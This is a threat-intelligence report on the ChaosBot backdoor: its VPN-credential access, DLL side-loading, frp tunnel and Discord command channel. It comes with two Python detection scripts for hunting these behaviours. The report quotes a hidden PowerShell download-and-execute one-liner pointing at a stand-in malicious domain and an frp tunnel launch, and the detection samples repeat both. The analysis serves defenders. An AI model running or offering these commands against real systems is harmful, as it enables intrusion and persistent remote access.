ChaosBot emerged in late September 2025 as a Rust-based backdoor aimed at corporate networks. Initial analysis indicated that the attackers gained access with compromised Cisco VPN credentials and over-privileged Active Directory accounts.
Once inside, the operators deployed ChaosBot through DLL side-loading: the legitimate Microsoft Edge component identity_helper.exe was copied to the C:\Users\Public\Libraries directory and used to load the malicious msedge_elf.dll placed beside it.
The malware's implementation in Rust and its reliance on Discord for command and control (C2) combine a modern toolchain with the abuse of a legitimate, widely allowed platform.
eSentire analysts observed that the operator behind ChaosBot used a Discord profile named "chaos_00019", suggesting a deliberate effort to hide C2 traffic among ordinary traffic to a popular service.
The victim profile points to Vietnamese-speaking environments, although lateral movement to other targets has been documented.
The combination of VPN credentials and over-privileged AD accounts gave the attackers unhindered WMI-based remote execution, allowing wide spread before detection.
After the initial breach, ChaosBot performs reconnaissance and sets up a fast reverse proxy (frp) tunnel for persistent access.
The malware downloads the frp client (renamed node.exe) along with its configuration file (node.ini) to C:\Users\Public\Music, then starts the proxy through a shell command executed via PowerShell:
powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; C:\Users\Public\Music\node.exe -c C:\Users\Public\Music\node.ini"
This establishes a covert channel over port 7000 to a remote AWS-hosted server, bypassing perimeter defenses and supporting further lateral movement.
Infection Procedure
ChaosBot's infection chain uses two main vectors: credential-based access and malicious Windows shortcuts.
In the first, valid Cisco VPN credentials and an over-privileged AD account named "serviceaccount" are used to run WMI commands that deliver and execute the ChaosBot payload (msedge_elf.dll) on target machines.
In the second, phishing messages carry .lnk files that invoke a PowerShell one-liner to download and execute ChaosBot while opening a decoy PDF styled after the State Bank of Vietnam to distract the user.
The PowerShell command takes the following form:
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://malicious-domain/dropper.exe' -OutFile $env:Temp\chaosbot.exe; Start-Process $env:Temp\chaosbot.exe"
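The host-side indicators described above (the identity_helper.exe side-load from C:\Users\Public\Libraries, the frp launch from C:\Users\Public\Music, the UTF-8 PowerShell wrapper, the hidden download-and-execute one-liner from the .lnk vector, and WMI-driven execution) can be turned into process-creation triage rules. The following Python is an added example, not code from eSentire or from the ChaosBot authors; its event records are constructed to resemble Sysmon Event ID 1 fields, and the Edge install roots, sample paths, version number and user names are assumptions.

```python
"""Process-creation triage for the ChaosBot tradecraft described above.

Added example, not code from eSentire or from the malware. The events are
constructed to resemble Sysmon Event ID 1 fields (Image, CommandLine,
ParentImage, User); the field names, paths, and sample values are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    command_line: str
    parent_image: str
    user: str


# World-writable staging directories the report associates with ChaosBot.
PUBLIC_DIRS = (r"c:\users\public\libraries", r"c:\users\public\music")
# Assumed legitimate install roots for Edge's identity_helper.exe.
EDGE_ROOTS = (r"c:\program files\microsoft\edge\application",
              r"c:\program files (x86)\microsoft\edge\application")
# The operator prefixes every shell command with this (see the frp launch above).
UTF8_PREFIX = "$outputencoding = [system.text.encoding]::utf8"
# An executable staged under C:\Users\Public\ started with "-c <file>.ini" (frp style).
FRP_LAUNCH = re.compile(r'c:\\users\\public\\\S+\.exe"?\s+-c\s+"?\S+\.ini')


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def triage(ev: ProcEvent) -> list[str]:
    """Return the indicator names an event matches, in rule order."""
    img, cmd = ev.image.lower(), ev.command_line.lower()
    parent = _basename(ev.parent_image)
    hits = []
    # 1. Side-loading host running outside the Edge install tree.
    if _basename(img) == "identity_helper.exe" and not img.startswith(EDGE_ROOTS):
        hits.append("edge-helper-outside-install-dir")
    # 2. ChaosBot's UTF-8 wrapper; rare on a legitimate command line.
    if _basename(img) in ("powershell.exe", "pwsh.exe") and UTF8_PREFIX in cmd:
        hits.append("chaosbot-utf8-shell-prefix")
    # 3. frp client launched from a Public\ directory with an .ini config.
    if FRP_LAUNCH.search(cmd):
        hits.append("frp-client-from-public-dir")
    # 4. .lnk vector: hidden PowerShell that downloads to %TEMP% and runs the file.
    if all(s in cmd for s in ("-windowstyle hidden", "invoke-webrequest",
                              "$env:temp", "start-process")):
        hits.append("hidden-download-and-execute")
    # 5. WMI remote execution of a staged payload: child of WmiPrvSE.exe that
    #    references a Public\ path or the side-loaded DLL.
    if parent == "wmiprvse.exe" and (
            any(d in cmd for d in PUBLIC_DIRS) or "msedge_elf.dll" in cmd):
        hits.append("wmi-remote-exec-staged-payload")
    return hits


def scan(events: list[ProcEvent]) -> list[list[str]]:
    """Triage every event; the result list is parallel to the input list."""
    return [triage(ev) for ev in events]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcEvent(r"C:\Users\Public\Libraries\identity_helper.exe",
              r"C:\Users\Public\Libraries\identity_helper.exe",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"CORP\serviceaccount"),
    ProcEvent(PS, r'powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; '
                  r'C:\Users\Public\Music\node.exe -c C:\Users\Public\Music\node.ini"',
              r"C:\Users\Public\Libraries\identity_helper.exe", r"CORP\serviceaccount"),
    ProcEvent(PS, "powershell -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri "
                  "'hxxps://malicious-domain/dropper.exe' -OutFile $env:Temp\\chaosbot.exe; "
                  "Start-Process $env:Temp\\chaosbot.exe\"",
              r"C:\Windows\explorer.exe", r"CORP\alice"),
    ProcEvent(r"C:\Program Files (x86)\Microsoft\Edge\Application\140.0.0.0\identity_helper.exe",
              r"C:\Program Files (x86)\Microsoft\Edge\Application\140.0.0.0\identity_helper.exe",
              r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", r"CORP\alice"),
    ProcEvent(PS, "powershell -Command Get-Process", r"C:\Windows\explorer.exe", r"CORP\alice"),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{_basename(ev.image):20} {hits or 'clean'}")
```

Rule 2 is the most specific of the five: a PowerShell command line that sets $OutputEncoding before running something is the operator's own wrapper, so it fires on every tasked command, not only on the frp launch. Rule 1 will also flag per-user Edge installs under %LOCALAPPDATA%; extend EDGE_ROOTS if those are common in your estate.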
On execution, ChaosBot validates its embedded Discord bot token with a GET request to https://discord.com/api/v10/users/@me, then creates a dedicated channel named after the victim's hostname via a POST under https://discord.com/api/v10/guilds/.
Shell commands subsequently received through Discord messages run in fresh PowerShell processes, each prefixed with the UTF-8 output-encoding statement so that output is not mangled.
Results, including stdout, stderr, screenshots, or file attachments, are returned to the operator's Discord channel via multipart/form-data POST requests.
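The Discord exchange just described (token check against /users/@me with the Bot authorization scheme, a channel named after the hostname, multipart uploads of results) leaves a recognisable sequence in egress telemetry whenever the client is not a browser. The following Python is an added example, not code from eSentire or from the malware; the HTTP records are constructed as a TLS-inspecting proxy or EDR network sensor might log them, the guild and channel IDs, token and hostname are placeholders, and the channel-creation and message endpoints follow Discord's public API rather than anything the report states beyond the /guilds/ prefix.

```python
"""Egress-log hunt for the Discord C2 exchange described above.

Added example, not eSentire's or the malware's code. Records are constructed
to resemble what a TLS-inspecting proxy or EDR network sensor logs per HTTP
request (client process, method, host, path, Authorization value, body);
the field layout, IDs, token and hostname are assumptions.
"""
import json
import re
from dataclasses import dataclass


@dataclass
class HttpEvent:
    process: str            # image path of the client process
    method: str
    host: str
    path: str
    auth: str = ""          # Authorization header value, if captured
    content_type: str = ""
    body: str = ""


BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe"}
DISCORD_API = re.compile(r"^/api/v\d+/")
# Discord's documented endpoints for creating a guild channel and posting a message.
CHANNEL_CREATE = re.compile(r"^/api/v\d+/guilds/\d+/channels$")
MESSAGE_POST = re.compile(r"^/api/v\d+/channels/\d+/messages$")
C2_CHAIN = {"bot-token-validation", "channel-named-after-host", "multipart-result-upload"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _channel_form(name: str) -> str:
    """Approximate Discord's text-channel naming: lowercase, separators to '-'."""
    return re.sub(r"[^a-z0-9]+", "-", name.lower()).strip("-")


def classify(ev: HttpEvent, hostname: str) -> list[str]:
    """Indicators a single request matches; browsers talking to Discord are ignored."""
    if ev.host.lower() != "discord.com" or not DISCORD_API.match(ev.path):
        return []
    if _basename(ev.process) in BROWSERS:
        return []
    hits = ["discord-api-from-non-browser"]
    # Stage 1: token check using the "Bot <token>" authorization scheme.
    if ev.method == "GET" and ev.path.endswith("/users/@me") and ev.auth.startswith("Bot "):
        hits.append("bot-token-validation")
    # Stage 2: per-victim channel whose name is the local hostname.
    if ev.method == "POST" and CHANNEL_CREATE.match(ev.path):
        try:
            name = json.loads(ev.body).get("name", "")
        except (ValueError, AttributeError):
            name = ""
        if name and _channel_form(name) == _channel_form(hostname):
            hits.append("channel-named-after-host")
    # Stage 3: command output, screenshots or files sent as multipart uploads.
    if (ev.method == "POST" and MESSAGE_POST.match(ev.path)
            and ev.content_type.lower().startswith("multipart/form-data")):
        hits.append("multipart-result-upload")
    return hits


def hunt(events: list[HttpEvent], hostname: str) -> dict[str, tuple[list[str], bool]]:
    """Per client process: sorted indicators and whether the full C2 chain was seen."""
    seen: dict[str, set[str]] = {}
    for ev in events:
        for hit in classify(ev, hostname):
            seen.setdefault(ev.process, set()).add(hit)
    return {proc: (sorted(hits), C2_CHAIN <= hits) for proc, hits in seen.items()}


IMPLANT = r"C:\Users\Public\Libraries\identity_helper.exe"
BROWSER = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
SAMPLE_EVENTS = [  # constructed records; IDs and token are placeholders
    HttpEvent(IMPLANT, "GET", "discord.com", "/api/v10/users/@me",
              auth="Bot MTIz.constructed.token"),
    HttpEvent(IMPLANT, "POST", "discord.com", "/api/v10/guilds/123456789012345678/channels",
              auth="Bot MTIz.constructed.token", content_type="application/json",
              body='{"name": "WS-FIN-07", "type": 0}'),
    HttpEvent(IMPLANT, "POST", "discord.com", "/api/v10/channels/222222222222222222/messages",
              auth="Bot MTIz.constructed.token",
              content_type="multipart/form-data; boundary=----constructed"),
    HttpEvent(BROWSER, "GET", "discord.com", "/api/v10/users/@me", auth="user-session-token"),
]

if __name__ == "__main__":
    for proc, (hits, full_chain) in hunt(SAMPLE_EVENTS, "WS-FIN-07").items():
        print(f"{proc}\n  {hits}\n  full C2 chain: {full_chain}")
```

Without body inspection stages 2 and 3 still work as a weaker signal (a non-browser process creating guild channels and posting multipart messages), so the rule degrades gracefully on proxies that log only method, host and path. The browser exclusion is deliberate: blocking discord.com outright is rarely an option, and a process-aware rule is what separates this C2 from ordinary use.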
This dual-vector approach, credential abuse and social engineering through malicious shortcuts, together with a legitimate service for C2, makes ChaosBot hard to detect and remove.
Masquerading as Microsoft Edge components and the careful output-encoding handling further reduce its footprint in targeted environments.